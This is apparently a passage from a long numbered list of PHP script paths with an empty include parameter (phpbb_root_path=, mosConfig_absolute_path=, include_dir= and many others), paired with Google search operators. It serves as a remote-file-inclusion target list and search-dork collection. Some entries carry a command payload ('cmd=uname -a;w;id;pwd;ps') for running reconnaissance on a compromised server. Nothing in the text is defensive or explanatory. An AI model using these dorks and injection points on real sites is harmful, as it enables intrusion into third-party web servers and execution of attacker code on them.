  1150. /yabbse/Sources/Packages.php?sourcedir= inurl:Yabbse
  1151. /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:fr
  1152. /include/main.php?config[search_disp]=true&include_dir= allinurl:/osticket/ site:us
  1153. /includes/functions_portal.php?phpbb_root_path= “powered by Integramod”
  1154. /phpopenchat/contrib/yabbse/poc.php?sourcedir=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
  1155. /calendar/calendar.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
  1156. /calendar/events/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
  1157. /calendar/setup/setupSQL.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
  1158. /calendar/setup/header.inc.php?serverPath=/.xpl/asc?&cmd=uname -a;w;id;pwd;ps
  1159. (www.google.com => intitle:”EasyPHPCalendar” exthp)
  1160. /install/index.php?lng=../../include/main.inc&G_PATH=
  1161. /template.php?pagina=
  1162. /inc/step_one_tables.php?server_inc=
  1163. /mainfile.php?MAIN_PATH=
  1164. /gallery/init.php?HTTP_POST_VARS=
  1165. index2.php?includes_dir=
  1166. forums/toplist.php?phpbb_root_path=
  1167. forum/toplist.php?phpbb_root_path=
  1168. admin/config_settings.tpl.php?include_path=
  1169. forum/index.php?includeFooter=
  1170. forums/bb_admin.php?includeFooter=
  1171. includes/kb_constants.php?module_root_path=
  1172. forums/includes/kb_constants.php?module_root_path=
  1173. classes/adodbt/sql.php?classes_dir=
  1174. agenda.php3?rootagenda=
  1175. topsites/sources/lostpw.php?CONFIG[path]=
  1176. topsites/sources/join.php?CONFIG[path]=
  1177. topsite/sources/join.php?CONFIG[path]=
  1178. extras/poll/poll.php?file_newsportal=
  1179. mail/index.php?site_path=
  1180. fclick/show.php?path=
  1181. calogic/reconfig.php?GLOBALS[CLPath]=
  1182. eshow.php?Config_rootdir=
  1183. auction/auction_common.php?phpbb_root_path=
  1184. index.php?inc_dir=
  1185. calendar/index.php?inc_dir=
  1186. modules/calendar/index.php?inc_dir=
  1187. ACalendar/embed/day.php?path=
  1188. calendar/add_event.php?inc_dir=
  1189. claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
  1190. docebo/modules/credits/help.php?lang=
  1191. modules/credits/help.php?lang=
  1192. editsite.php?returnpath=
  1193. in.php?returnpath=
  1194. includes/pafiledb_constants.php?module_root_path=
  1195. phpBB/includes/pafiledb_constants.php?module_root_path=
  1196. pafiledb/includes/pafiledb_constants.php?module_root_path=
  1197. auth/auth.php?phpbb_root_path=
  1198. auth/auth_phpbb/phpbb_root_path=
  1199. apc-aa/cron.php3?GLOBALS[AA_INC_PATH]=
  1200. dkp/includes/dbal.php?eqdkp_root_path=
  1201. path/include/SQuery/gameSpy2.php?libpath=
  1202. include/global.php?GLOBALS[includeBit]=
  1203. topsites/config.php?returnpath=
  1204. ubbthreads/addpost_newpoll.php?addpoll=thispath=
  1205. forum/addpost_newpoll.php?thispath=
  1206. forums/addpost_newpoll.php?thispath=
  1207. ubbthreads/ubbt.inc.php?thispath=
  1208. forums/ubbt.inc.php?thispath=
  1209. forum/ubbt.inc.php?thispath=
  1210. forum/admin/addentry.php?phpbb_root_path=
  1211. admin/addentry.php?phpbb_root_path=
  1212. index.php?act=
  1213. ipchat.php?root_path=
  1214. ladders/stats.php?dir[base]=
  1215. vwar/admin/admin.php?vwar_root=
  1216. forum/impex/ImpExData.php?systempath=
  1217. forums/impex/ImpExData.php?systempath=
  1218. index.php?theme_path=
  1219. become_editor.php?theme_path=
  1220. detail.php?theme_path=
  1221. fav.php?theme_path=
  1222. get_rated.php?theme_path=
  1223. login.php?theme_path=
  1224. mailing_list.php?theme_path=
  1225. modify.php?theme_path=
  1226. power_search.php?theme_path=
  1227. review.php?theme_path=
  1228. cgi-bin/include/print_category.php?dir=
  1229. includes/class_template.php?quezza_root_path=
  1230. classified_right.php?language_dir=
  1231. phpBazar/classified_right.php?language_dir=
  1232. phpMyChat/chat/messagesL.php3?cmd=
  1233. visitorupload.php?cmd=
  1234. index.php?req_path=
  1235. Farsi1/index.php?archive=
  1236. show_archives.php?template=
  1237. pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=
  1238. vuln.php?=
  1239. admin/common.inc.php?basepath=
  1240. pm/lib.inc.php?pm_path=
  1241. artmedic-kleinanzeigen-path/index.php?id=
  1242. include/main.php?config[search_disp]=include_dir=
  1243. phpcoin/config.php?_CCFG[_PKG_PATH_DBSE]=
  1244. quick_reply.php?phpbb_root_path=
  1245. _conf/core/common-tpl-vars.php?confdir=
  1246. votebox.php?VoteBoxPath=
  1247. modules/news/archivednews.php?GLOBALS[language_home]=
  1248. extensions/moblog/moblog_lib.php?basedir=
  1249. modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=
  1250. phpWebLog/include/init.inc.php?G_PATH=
  1251. trg_news30/trgnews/install/article.php?dir=
  1252. path_to_script/block.php?Include=
  1253. examples/phonebook.php?page=
  1254. email.php?login=cer_skin=
  1255. PhotoGal/ops/gals.php?news_file=
  1256. loginout.php?cutepath=
  1257. oneadmin/config.php?path[docroot]=
  1258. xcomic/initialize.php?xcomicRootPath=
  1259. skin/zero_vote/error.php? dir=
  1260. admin_modules/admin_module_deldir.inc.php?config[path_src_include]=
  1261. src/image-gd.class.php?config[path_src_include]=
  1262. src/image.class.php?config[path_src_include]=
  1263. src/show_random.inc.php?config[path_src_include]=
  1264. yappa-ng/src/index_overview.inc.php?config[path_src_include]=
  1265. admin_modules/admin_module_captions.inc.php?config[path_src_include]=
  1266. admin_modules/admin_module_rotimage.inc.php?config[path_src_include]=
  1267. /components/com_htmlarea3_xtd-c/popups/ImageManager/config.inc.php?mosConfig_absolute_path=
  1268. /components/com_pccookbook/pccookbook.php?mosConfig_absolute_path=
  1269. /components/com_extcalendar/extcalendar.php?mosConfig_absolute_path=
  1270. /components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=
  1271. /components/com_securityimages/lang.php?mosConfig_absolute_path=
  1272. /auth/auth_phpbb/phpbb_root_path=
  1273. /forums/index.php?includeFooter=
  1274. /forums/bb_admin.php?includeFooter=
  1275. /language/lang_english/lang_activity.php?phpbb_root_path=
  1276. /modules/mod_calendar.php?absolute_path=
  1277. /topsites/sources/lostpw.php?CONFIG[path]=
  1278. /topsites/sources/join.php?CONFIG[path]=
  1279. /toplist/sources/join.php?CONFIG[path]=
  1280. /calogic/reconfig.php?GLOBALS[CLPath]=
  1281. /calendar/add_event.php?inc_dir=
  1282. /claroline/auth/extauth/drivers/ldap.inc.php?clarolineRepositorySys=
  1283. /claroline/auth/ldap/authldap.php?includePath=
  1284. /docebo/modules/credits/help.php?lang=
  1285. /phpBB/includes/pafiledb_constants.php?module_root_path=
  1286. /phpdig/includes/config.php?relative_script_path=
  1287. /include/global.php?GLOBALS[includeBit]=
  1288. /ubbthreads/ubbt.inc.php?thispath=
  1289. /forum/ubbt.inc.php?thispath=
  1290. /ladders/stats.php?dir[base]=
  1291. /chat/messagesL.php3?cmd=
  1292. /phpMyChat/chat/messagesL.php3?cmd=
  1293. /index.php?archive=
  1294. /show_archives.php?template=
  1295. /pmwiki wiki/pmwiki-2.1.beta20/pmwiki.php?GLOBALS[FarmD]=
  1296. /pm/lib.inc.php?pm_path=
  1297. /artmedic-kleinanzeigen-path/index.php?id=
  1298. /osticket/include/main.php?include_dir=
  1299. /zboard/include/write.php?dir=
  1300. /_conf/core/common-tpl-vars.php?confdir=
  1301. /al_initialize.php?alpath=
  1302. /include/help.php?base=
  1303. /skin/zero_vote/setup.php?dir=
  1304. /gui/include/sql.php?include_path=
  1305. /webmail/lib/emailreader_execute_on_each_page.inc.php?emailread er_ini=
  1306. /oneadmin/config.php?path[docroot]=
  1307. /admin_modules/admin_module_captions.inc.php?config[path_src_include]=
  1308. /src/index_passwd-admin.inc.php?config[path_admin_include]=
  1309. /src/album.class.php?config[path_src_include]=
  1310. /includes/db_adodb.php?baseDir=
  1311. /includes/db_connect.php?baseDir=
  1312. /modules/projects/vw_files.php?dPconfig[root_dir]=
  1313. /nukebrowser.php?filnavn=
  1314. /Sources/Packages.php?sourcedir=
  1315. /cgi-bin//gadgets/Blog/BlogModel.php?path=
  1316. /Blog/BlogModel.php?path=
  1317. /modules/Forums/admin/admin_forums.php?phpEx=
  1318. /modules/Forums/admin/admin_mass_email.php?phpEx=
  1319. /mt-comments.cgi?id=
  1320. /cmd/product_info.php/products_id/1622/shop_content.php?coID=
  1321. /search.php?cutepath=
  1322. /vCard/admin/define.inc.php?match=
  1323. /forum/viewtopic.php?t=
  1324. /announcements.php?includePath=
  1325. /forum/misc.php?action=
  1326. /gallery.php=
  1327. /forum/admin/actions/del.php?include_path=
  1328. /phpprojekt/lib/authform.inc.php?path_pre=
  1329. /include/mysql.php?inc_dir=
  1330. /install.php?phpbb_root_dir=
  1331. /phorum/admin/actions/del.php?include_path=
  1332. /pollensondage.inc.php?app_path=
  1333. /user/ldap_example.php?inc_dir=
  1334. /live-support/inc/pipe.php?HCL_path=
  1335. /gnu3/index.php?doc=
  1336. /include/authform.inc.php?path_pre=
  1337. /web_statistics/modules/coppermine/themes/default/theme.php?THEME_DIR=
  1338. /web_statistics//tools/send_reminders.php?includedir=
  1339. /calendar/events/datePicker.php?serverPath=
  1340. /dotproject/modules/projects/vw_files.php?root_dir=
  1341. /album_portal.php?phpbb_root_path=
  1342. /ideabox/include.php?gorumDir=
  1343. /index.php?sayfa=
  1344. /includes/include_onde.php?include_file=
  1345. /index.php?modpath=
  1346. /index.php?sqld=
  1347. /index.php?mainpage=
  1348. /index.php?configFile=
  1349. /ipchat.php?root_path=
  1350. /browse.php?theme_path=
  1351. /detail.php?theme_path=
  1352. /rating.php?theme_path=
  1353. /register.php?theme_path=
  1354. /review.php?theme_path=
  1355. /index.php?req_path=
  1356. /iframe.php?file=
  1357. /os/pointer.php?url=
  1358. /index.php?mosConfig_absolute_path=
  1359. /administrator/components/com_banners/admin.banners.html.php?mosConfig_absolute_path=
  1360. /administrator/components/com_contact/admin.contact.html.php?mosConfig_absolute_path=
  1361. /administrator/components/com_contact/admin.contact.php?mosConfig_absolute_path=
  1362. /administrator/components/com_contact/toolbar.contact.html.php?mosConfig_absolute_path=
  1363. /administrator/components/com_events/admin.events.php?mosConfig_absolute_path=
  1364. /administrator/components/com_massmail/admin.massmail.php?mosConfig_absolute_path=
  1365. /administrator/components/com_massmail/toolbar.massmail.php?mosConfig_absolute_path=
  1366. /administrator/components/com_media/admin.media.html.php?mosConfig_absolute_path=
  1367. /administrator/components/com_media/toolbar.media.html.php?mosConfig_absolute_path=
  1368. /administrator/components/com_menus/components/components.menu.php?mosConfig_absolute_path=
  1369. /administrator/components/com_menus/content_archive_category/content_archive_category.menu.html.php?mosConfig_a bsolute_path=
  1370. /administrator/components/com_menus/content_archive_category/content_archive_category.menu.php?mosConfig_absolu te_path=
  1371. /administrator/components/com_menus/content_archive_section/content_archive_section.menu.html.php?mosConfig_ab solute_path=
  1372. /administrator/components/com_menus/content_archive_section/content_archive_section.menu.php?mosConfig_absolut e_path=
  1373. /administrator/components/com_menus/content_blog_category/content_blog_category.menu.php?mosConfig_absolute_ path=
  1374. /administrator/components/com_menus/content_blog_section/content_blog_section.class.php?mosConfig_absolute_ path=
  1375. /administrator/components/com_menus/content_blog_section/content_blog_section.menu.php?mosConfig_absolute_p ath=
  1376. /administrator/components/com_menus/content_category/content_category.menu.html.php?mosConfig_absolute_ path=
  1377. /administrator/components/com_menus/content_section/content_section.menu.html.php?mosConfig_absolute_p ath=
  1378. /administrator/components/com_menus/content_section/content_section.menu.php?mosConfig_absolute_path=
  1379. /administrator/components/com_menus/content_typed/content_typed.menu.html.php?mosConfig_absolute_pat h=
  1380. /administrator/components/com_messages/toolbar.messages.html.php?mosConfig_absolute_path=
  1381. /administrator/components/com_messages/toolbar.messages.php?mosConfig_absolute_path=
  1382. /administrator/components/com_sections/admin.sections.html.php?mosConfig_absolute_path=
  1383. /administrator/components/com_sections/toolbar.sections.php?mosConfig_absolute_path=
  1384. /administrator/components/com_users/admin.users.php?mosConfig_absolute_path=
  1385. /administrator/images/cancel.png?mosConfig_absolute_path=
  1386. /administrator/images/cancel_f2.png?mosConfig_absolute_path=
  1387. /administrator/images/delete_f2.png?mosConfig_absolute_path=
  1388. /administrator/images/move_f2.png?mosConfig_absolute_path=
  1389. /administrator/images/preview.png?mosConfig_absolute_path=
  1390. /administrator/images/publish_f2.png?mosConfig_absolute_path=
  1391. /administrator/images/save_f2.png?mosConfig_absolute_path=
  1392. /components/com_banners/banners.class.php?mosConfig_absolute_path=
  1393. /components/com_contact/contact.php?mosConfig_absolute_path=
  1394. /components/com_content/content.php?mosConfig_absolute_path=
  1395. /components/com_htmlarea3_xtd-c/popups/select_color.php ?mosConfig_absolute_path=
  1396. /components/com_messages/messages.class.php?mosConfig_absolute_path=
  1397. /components/com_user/user.php?mosConfig_absolute_path=
  1398. /includes/sef.php?mosConfig_absolute_path=
  1399. /modules/mod_archive.php?mosConfig_absolute_path=
  1400. /modules/mod_latestnews.php?mosConfig_absolute_path=
  1401. /modules/mod_login.php?mosConfig_absolute_path=
  1402. /modules/mod_related_items.php?mosConfig_absolute_path=
  1403. /modules/mod_whosonline.php ?mosConfig_absolute_path=
  1404. /example/inc/top.inc.php?rootdir=
  1405. /core/index/index_album.php?P_INDEX=
  1406. /system/libraries/Geeklog/MVCnPHP/BaseView.php?glConf[path_libraries]=
  1407. /previewtheme.php?theme=1&inc_path=
  1408. /plateforme/code/inc/common.inc.php?inc_path=
  1409. /includes/includes.php?site_path=
  1410. /includes/usercp_viewprofile.php?phpbb_root_path=
  1411. /cadre/fw/class.Quick_Config_Browser.php?GLOBALS[config][framework_path]=
  1412. /include/themes/themefunc.php?myNewsConf[path][sys][index]=
  1413. /membres/membreManager.php?include_path=
  1414. /download.php?fname=
  1415. /admin/admin_linkdb.php?phpbb_root_path=
  1416. /admin/admin_forum_prune.php?phpbb_root_path=
  1417. /admin/admin_extensions.php?phpbb_root_path=
  1418. /i-accueil.php?chemin=
  1419. /config/mysql_config.php?INC=
  1420. /main/ppcclick.php?INC=
  1421. /index.php?AML_opensite=
  1422. /popup.php?include_path=
  1423. /sitemap.scr.php?GLOBALS[PTH][classes]=
  1424. /news.scr.php?GLOBALS[PTH][classes]=
  1425. /polls.scr.php?GLOBALS[PTH][classes]=
  1426. /xtextarea.scr.php?GLOBALS[PTH][spaw]=
  1427. /general.func.php?GLOBALS[PTH][classes]=
  1428. /groups.func.php?GLOBALS[PTH][classes]=
  1429. /js.func.php?GLOBALS[PTH][classes]=
  1430. /sections.func.php?GLOBALS[PTH][classes]=
  1431. /src/admin/pt_upload.php?config_file=[local server file]&ptconf[src]=
  1432. /authenticate.php?default_path_for_themes=
  1433. /admin/auth.php?emgb_admin_path=
  1434. /[inertia_dir]/inertianews_main.php?inews_path=
  1435. /include/account.inc.php?action=update&incpath=
  1436. /include/header.inc.php?incpath=
  1437. /include/body.inc.php?incpath=?
  1438. /include/menu_v.inc.php?incpath=
  1439. /archive.php?abs=
  1440. /main.inc.php?pathtoscript=
  1441. /modules/mx_charts/charts_constants.php?module_root_path=
  1442. /basic.inc.php?basepath_start=
  1443. /mxBB/modules/kb_mods/includes/kb_constants.php?module_root_path=
  1444. /includes/common.php?module_root_path=
  1445. /common.php?db_file=
  1446. /Index.php?abs_url=
  1447. /php.incs/common.inc.php?cm_basedir=
  1448. /PhotoCart/adminprint.php?admin_folder=
  1449. /PhotoCart/adminprint.php?path=
  1450. /includes/password.php?GlobalSettings[templatesDirectory]=
  1451. /phppc/poll_kommentar.php?is_phppc_included=1&relativer_p fad=
  1452. /dsp/dsp_bookings.php?apx_root_path=
  1453. /check_status.php?dicshunary_root_path=
  1454. /_basicfunctions.php?DIR=
  1455. /phpjobschedule_PATH/add-modify.php?installed_config_file=
  1456. /include/classes/pear/DB/mysql.php?baseDir=
  1457. /work/module/forum/forum.php?g_include=
  1458. /index.php?function=custom&custom=
  1459. /language.inc.php?langs_dir=
  1460. /admin/index.php?p=
  1461. /admin/auth/checklogin.php?cfgProgDir=
  1462. /admin/mods/simplechat_1.0.0/chat_panel.php?talk=1&msg=
  1463. /sohoadmin/program/includes/shared_functions.php?_SESSION[docroot_path]=
  1464. /cyberfolio/portfolio/admin/incl_voir_compet.php?av=
  1465. /modules/Mysqlfinder/MysqlfinderAdmin.php?_SESSION[PATH_COMPOSANT]=
  1466. /interface/billing/billing_process.php?srcdir=
  1467. /interface/new/new_patient_save.php?srcdir=
  1468. /login.php?srcdir=
  1469. /modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=
  1470. /lib/includes/loader.web.php?store_config=
  1471. /function_balise_url.php?racine=
  1472. /connection.php?racine=
  1473. /volume.php?config[public_dir]=
  1474. /themes/fin.php?themes=
  1475. /common.php?SWSDIR=
  1476. /modules/core/demo/append.php?PS_BASE=
  1477. /upgrades/2.1beta1/upgrade.php?amp_conf[AMPWEBROOT]=
  1478. /Core/core.inc.php?fullpath=
  1479. /event.php?myevent_path=
  1480. /toplist.php?f=toplist_top10&phpbb_root_path=
  1481. /eshow.php?Config_rootdir=
  1482. /visible_count_inc.php?statitpath=
  1483. /direct.php?rf=
  1484. /extauth/drivers/ldap.inc.php?clarolineRepositorySys=
  1485. /include.php?path=
  1486. /end.php?footfile=
  1487. /include/menu_builder.php?config[page_dir]=
  1488. /textpattern/publish.php?txpcfg[txpath]=
  1489. /lib.editor.inc.php?sys_path=
  1490. /index.php?foing_root_path=
  1491. /list.php?foing_root_path=
  1492. /view_artist.php?foing_root_path=
  1493. /flash/set_na.php?foing_root_path=
  1494. /flash/initialise.php?foing_root_path=
  1495. /flash/get_song.php?foing_root_path=
  1496. /includes/common.php?foing_root_path=
  1497. /admin/nav.php?foing_root_path=
  1498. /admin/list_artists.php?foing_root_path=
  1499. /admin/genres.php?foing_root_path=
  1500. /OTSCMS.php?GLOBALS[config][otscms][directories][classes]=
  1501. /admin/inc/prepend.inc.php?path=
  1502. /admin/inc/lib/tools.lib.php?path=
  1503. /admin/tools/trackback/index.php?path=
  1504. /admin/tools/utf8conversion/index.php?path=
  1505. /inc/prepend.inc.php?path=
  1506. /inc/lib/boxes.lib.php?path=
  1507. /inc/lib/history.lib.php?path=
  1508. /mdweb/admin/inc/organisations/country_insert.php?chemin_appli=
  1509. /jaws_PATH/html/include/JawsDB.php?path=
  1510. /misc/function.php3?path=
  1511. /include/entrancePage.tpl.php?SPEEDBERG_PATH=
  1512. /include/generalToolBox.tlb.php?SPEEDBERG_PATH=
  1513. /include/simplePage.tpl.php?SPEEDBERG_PATH=
  1514. /include.class.php?SPEEDBERG_PATH=
  1515. /main.php?config=
  1516. /kawf/user/account/main.php?config=
  1517. /phpcalendar/includes/calendar.php?phpc_root_path=
  1518. /editmeetings/session.php?PROJECT_ROOT=
  1519. /email/session.php?PROJECT_ROOT=
  1520. /entityproperties/session.php?PROJECT_ROOT=
  1521. /_msdazu_pdata/redaktion/artikel/up/index.php?path_red2=
  1522. /_msdazu_share/richtext/addtort.php?path_red2=
  1523. /_msdazu_share/richtext/colorpik2.php?path_red2=
  1524. /_msdazu_share/richtext/newfile.php?path_red2=
  1525. /modules/My_eGallery/public/displayCategory.php?adminpath=
  1526. /db/txt.inc.php?file=&check=0&comment=
  1527. /evilfile.php?evil_include=
  1528. /php/plugins/main.php?plug_path=
  1529. /local/lib/lcUser.php?LIBDIR=
  1530. /modules/guestbook/index.php?CONFIG[local_root]=
  1531. /circ.php?include_path=
  1532. /templates/sidebar/template.tpl.php?renderer=
  1533. /templates/oerdec/template.tpl.php?renderer=
  1534. /templates/mylook/template.tpl.php?renderer=
  1535. /sw/lib_cart/lib_cart.php?doc_directory=
  1536. /web/lib/xml/oai/GetRecord.php?lib_dir=
  1537. /client.php?dir=
  1538. /p-news.php?pn_lang=
  1539. /template.php?actionsPage=
  1540. /implementation/management/priv/bugreporter/thankyou.php?g_documentRoot=
  1541. /template/barnraiser_01/p_new_password.tpl.php?templatePath=
  1542. /centipaid_class.php?absolute_path=
  1543. /inc/settings.php?inc_dir=
  1544. /extras/mt.php?web_root=
  1545. /genepi.php?topdir=
  1546. /includes/functions_mod_user.php?phpbb_root_path=
  1547. /lib/registry.lib.php?lib_dir=
  1548. /common.php?phpht_real_path=
  1549. /addon_keywordreplacer.php?pathToFiles=
  1550. /add.php?Htmls=
  1551. /phpBB2/includes/functions_mod_user.php?phpbb_root_path=
  1552. /naboard_pnr.php?skin=
  1553. /report.php?scriptpath=
  1554. /index.php?section=
  1555. /redir.php?foaf=
  1556. /modules/Calendar/scheme.php?calpath=
  1557. /modules/Calendar/calendar.php?calpath=
  1558. /claroline/inc/lib/import.lib.php?includePath=
  1559. /example/lib/grid3.lib.php?cfg_dir=
  1560. /jinzora2/backend/primitives/cache/media.php?include_path=
  1561. /include/cts/standart.inc.php?topdir=
  1562. /sw/lib_up_file/file.php?doc_directory=
  1563. /sw/lib_find/find.php?doc_directory=
  1564. /webyep-system/programm/lib/WYDocument.php?webyep_sIncludePath=
  1565. /webyep-system/programm/elements/WYGalleryElement.php?webyep_sIncludePath=
  1566. /include/disp_form.php3?cfg_include_dir=
  1567. /include/index.php3?cfg_include_dir=
  1568. /moteur/moteur.php?chemin=
  1569. /forum.php?cfg_file=1&fpath=
  1570. /includes/logger_engine.php?phpbb_root_path=
  1571. /module/forum/headlines.php?id=1&main_dir=
  1572. /admin/admin_topic_action_logging.php?setmodules=pagestar t&phpbb_root_path=
  1573. /create_file.php?target=
  1574. /upload_local.php?target=
  1575. /upload_multi.php?target=
  1576. /index.php?file_name[]=
  1577. /forum/member.php?repertorylevel=
  1578. /forum/mail.php?repertorylevel=
  1579. /forum/lostpassword.php?repertorylevel=
  1580. /forum/gesfil.php?repertorylevel=
  1581. /include/config.inc.php?lvc_include_dir=
  1582. /includes/bbcb_mg.php?phpbb_root_path=
  1583. /sources/myaccount.php?close_box=
  1584. /navigation/donation.php?navigation_end=
  1585. /navigation/links.php?navigation_start=
  1586. /parse/parser.php?WN_BASEDIR=
  1587. /navigation/menu.php?navigation_start=
  1588. /templates/pb/language/lang_nl.php?temppath=
  1589. /admin/admin_topic_action_logging.php?setmodules=
  1590. /admin/index.php?o=
  1591. /template.php?content_page=
  1592. /libs/dbmax/mysql.php?GLOBALS[‘lib’][‘db’][‘path’]=
  1593. /admin/testing/tests/0004_init_urls.php?init_path=
  1594. /global.php?nbs=
  1595. /dix.php3?url_phpartenaire=
  1596. /inc/ifunctions.php?GLOBALS[phpQRootDir]=
  1597. /manager/pages/AddPaymentPage.class.php?base_path=
  1598. /manager/pages/ConfigureNewUserPage.class.php?base_path=
  1599. /manager/pages/ConfigureNewUserReceiptPage.class.php?base_path=
  1600. /manager/pages/DeleteProductPage.class.php?base_path=
  1601. /manager/pages/DeleteServerPage.class.php?base_path=
  1602. /manager/pages/DomainsPage.class.php?base_path=
  1603. /manager/pages/EditAccountPage.class.php?base_path=
  1604. /manager/pages/EditDomainPage.class.php?base_path=
  1605. /manager/pages/EditHostingServicePage.class.php?base_path=
  1606. /manager/pages/EditProductPage.class.php?base_path=
  1607. /manager/pages/EditServerPage.class.php?base_path=
  1608. /manager/pages/EmailInvoicePage.class.php?base_path=
  1609. /manager/pages/InactiveAccountsPage.class.php?base_path=
  1610. /manager/pages/NewProductPage.class.php?base_path=
  1611. anasayfa.php?syf=
  1612. index.php?syf=
  1613. index.php?sayfa=
  1614. anasayfa.php?page=
  1615. index.php?x= | inurl:”index.php?x=*.php”
  1616. index.php?nic= | inurl:”index.php?nic=*.php”
  1617. homepage.php?sel= | inurl:”homepage.php?sel=*.php”
  1618. index.php?sel= | inurl:”index.php?sel=*.php”
  1619. main.php?x= | inurl:”main.php?x=*.php”
  1620. index2.php?x= | inurl:index2.php?x=*.php”
  1621. main.php?pagina= | inurl:”main.php?pagina=*.php”
  1622. test.php?page= | inurl:test.php?page=
  1623. index.php?stranica=
  1624. administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=
  1625. index.php?url=
  1626. index.php?file=
  1627. index_principal.php?pagina=
  1628. inc/cmses/aedating4CMS.php?dir[inc]= inurl:flashchat site:br bp_ncom.php?bnrep=
  1629. /yabbse/Sources/Packages.php?sourcedir=
  1630. /skin/zero_vote/error.php?dir=
  1631. /modules/TotalCalendar/about.php?inc_dir=
  1632. phpwcms/include/inc_ext/spaw/dialogs/table.php?spaw_root=
  1633. index.php?lang=gr&file
  1634. index.php?_REQUEST=&_REQUEST%5boption%5d=com_conte nt&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absol ute_path=
  1635. solpot.html?body=
  1636. administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path= /tools/send_reminders.php?includedir= allinurl:day.php?date=
  1637. index.php?u=administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_ path=
  1638. administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=modules/My_eGallery/index.php?basepath=
  1639. index.php?rage=
  1640. components/com_mtree/Savant2/Savant2_Plugin_stylesheet.php?mosConfig_absolute_p ath=
  1641. index.php?screen=
  1642. press.php?param=
  1643. nota.php?pollname=
  1644. nota.php?ki=
  1645. base.php?incl=
  1646. principal.php?url=
  1647. template.php?str=
  1648. down*.php?left=
  1649. view.php?*[*]*=
  1650. file.php?cont=
  1651. include.php?chapter=
  1652. path.php?my=
  1653. head.php?cmd=
  1654. template.php?panel=
  1655. sub*.php?channel=
  1656. sitio.php?rub=
  1657. padrao.php?seite=
  1658. mod*.php?tipo=
  1659. gallery.php?ref=
  1660. layout.php?path=
  1661. nota.php?seite=
  1662. main.php?corpo=
  1663. down*.php?where=
  1664. enter.php?numero=
  1665. info.php?op=
  1666. gallery.php?oldal=
  1667. press.php?incl=
  1668. index2.php?pname=
  1669. default.php?pr=
  1670. page.php?sivu=
  1671. include.php?my=
  1672. view.php?pag=
  1673. path.php?header=
  1674. principal.php?basepath=
  1675. nota.php?oldal=
  1676. principal.php?module=
  1677. head.php?pname=
  1678. press.php?dir=
  1679. down*.php?x=
  1680. press.php?second=
  1681. general.php?pr=
  1682. layout.php?panel=
  1683. principal.php?q=
  1684. file.php?viewpage=
  1685. sitio.php?sec=
  1686. padrao.php?tipo=
  1687. enter.php?play=
  1688. head.php?inc=
  1689. head.php?g=
  1690. general.php?header=
  1691. index2.php?include=
  1692. gallery.php?pre=
  1693. path.php?chapter=
  1694. index3.php?pageweb=
  1695. path.php?where=
  1696. pagina.php?home=
  1697. template.php?cont=
  1698. file.php?pollname=
  1699. home.php?g=
  1700. pagina.php?incl=
  1701. press.php?panel=
  1702. blank.php?name=
  1703. page.php?mod=
  1704. path.php?play=
  1705. gallery.php?base_dir=
  1706. *inc*.php?to=
  1707. index2.php?rub=
  1708. general.php?opcion=
  1709. home.php?page=
  1710. main.php?subject=
  1711. press.php?addr=
  1712. sub*.php?phpbb_root_path=
  1713. index3.php?middle=
  1714. include.php?in=
  1715. press.php?subject=
  1716. general.php?menu=
  1717. index1.php?link=
  1718. sitio.php?destino=
  1719. principal.php?d=
  1720. template.php?y=
  1721. standard.php?phpbb_root_path=
  1722. include.php?panel=
  1723. start.php?oldal=
  1724. enter.php?middle=
  1725. base.php?w=
  1726. blank.php?ir=
  1727. home.php?disp=
  1728. gallery.php?pollname=
  1729. index3.php?secc=
  1730. index2.php?thispage=
  1731. sitio.php?secao=
  1732. general.php?link=
  1733. gallery.php?loader=
  1734. pagina.php?to=
  1735. enter.php?r=
  1736. general.php?adresa=
  1737. index1.php?url=
  1738. enter.php?panel=
  1739. blank.php?t=
  1740. press.php?goFile=
  1741. base.php?lang=
  1742. index.php?op=
  1743. info.php?mid=
  1744. blank.php?ref=
  1745. sitio.php?pageweb=
  1746. head.php?middlePart=
  1747. gallery.php?ev=
  1748. down*.php?s=
  1749. page.php?section=
  1750. index1.php?goFile=
  1751. start.php?mid=
  1752. principal.php?tipo=
  1753. index3.php?thispage=
  1754. include.php?cont=
  1755. nota.php?category=
  1756. info.php?loader=
  1757. print.php?sp=
  1758. show.php?d=
  1759. print.php?cont=
  1760. nota.php?adresa=
  1761. page.php?read=
  1762. pagina.php?base_dir=
  1763. pagina.php?channel=
  1764. principal.php?b=
  1765. standard.php?pollname=
  1766. print.php?s=
  1767. index1.php?param=
  1768. down*.php?goFile=
  1769. blank.php?header=
  1770. sitio.php?opcion=
  1771. gallery.php?rub=
  1772. index1.php?pa=
  1773. index3.php?x=
  1774. gallery.php?itemnav=
  1775. main.php?oldal=
  1776. press.php?pg=
  1777. down*.php?showpage=
  1778. index1.php?filepath=
  1779. blank.php?rub=
  1780. padrao.php?op=
  1781. default.php?pa=
  1782. index1.php?itemnav=
  1783. layout.php?seite=
  1784. nota.php?second=
  1785. mod*.php?numero=
  1786. press.php?home=
  1787. base.php?texto=
  1788. gallery.php?sec=
  1789. base.php?var=
  1790. enter.php?addr=
  1791. start.php?home=
  1792. path.php?disp=
  1793. down*.php?strona=
  1794. principal.php?seccion=
  1795. principal.php?n=
  1796. padrao.php?incl=
  1797. file.php?choix=
  1798. general.php?chapter=
  1799. pagina.php?in=
  1800. sub*.php?pag=
  1801. view.php?get=
  1802. enter.php?str=
  1803. enter.php?name=
  1804. template.php?opcion=
  1805. blank.php?left=
  1806. include.php?tipo=
  1807. principal.php?loc=
  1808. index.php?y=
  1809. file.php?nivel=
  1810. mod*.php?play=
  1811. include.php?ir=
  1812. include.php?ki=
  1813. nota.php?eval=
  1814. default.php?p=
  1815. file.php?basepath=
  1816. include.php?goFile=
